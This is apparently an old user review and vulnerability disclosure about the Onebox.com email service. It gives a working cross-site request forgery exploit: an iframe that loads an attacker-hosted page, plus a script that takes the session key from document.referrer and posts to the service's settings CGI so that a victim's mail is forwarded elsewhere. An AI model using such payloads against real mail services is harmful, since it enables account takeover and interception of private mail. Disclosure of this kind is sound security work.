Onebox.com provides an email service which allows execution of javascript code and also allows access to any of its CGI's. I cut and pasted the source HTML to the "Forwarding and Notification" page into my free website and embedded the following code into an email:

<iframe src='http://www.anzwers.org/free/email/onebox.html' />

This exploit resulted in all of my e-mail being forwarded to another address. This is not good. The main problem here is that Onebox.com does not check the path of the pages calling their cgi's. Admittedly the source HTML code needed a few minor mods to establish the key value of the login session by means of the document.referrer object and a javascript split string function, followed by some dynamic HTML. i.e.

<script>
df=document.referrer;
s=df.split('msg?');
s=s[0];
key=df.split('=');
document.write('<form method=post action="'+s);
document.write('/options?u='+key[3]+'&r='+key[4]+'" name=TheForm>');
</script>

On a positive note, the service is very easy to use and if you dont mind your email being open to the world, it would make a fine junk-mail account. Onebox also require entry of current passwords before changes to critical settings are allowed, so that is also a plus. Use this service at your own risk.



Recommended: No